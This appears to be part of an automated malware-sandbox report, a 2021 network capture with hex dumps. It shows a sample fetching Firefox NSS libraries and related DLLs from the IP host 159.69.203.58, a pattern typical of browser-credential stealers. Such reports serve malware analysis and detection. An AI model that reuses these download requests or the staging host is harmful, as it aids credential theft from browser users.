73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Sep 25, 2021 10:15:03.387618065 CEST	1059	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Sep 25, 2021 10:15:03.387664080 CEST	1060	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Sep 25, 2021 10:15:03.387712002 CEST	1062	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
Sep 25, 2021 10:15:03.387764931 CEST	1063	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Sep 25, 2021 10:15:03.387820005 CEST	1065	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Sep 25, 2021 10:15:03.387868881 CEST	1066	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Sep 25, 2021 10:15:03.387922049 CEST	1067	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Sep 25, 2021 10:15:03.387983084 CEST	1069	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Sep 25, 2021 10:15:03.388020992 CEST	1070	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Sep 25, 2021 10:15:03.410573006 CEST	1072	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Sep 25, 2021 10:15:03.577807903 CEST	1403	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:03.600239038 CEST	1404	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:03 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Sep 25, 2021 10:15:03.672425985 CEST	1547	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:03.696712971 CEST	1549	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:03 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Sep 25, 2021 10:15:03.897039890 CEST	2008	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:03.921941042 CEST	2009	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:03 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:03 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Sep 25, 2021 10:15:04.590714931 CEST	3326	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 159.69.203.58 Connection: Keep-Alive
Sep 25, 2021 10:15:04.613969088 CEST	3327	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 Sep 2021 08:15:04 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Sun, 26 Sep 2021 08:15:04 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data 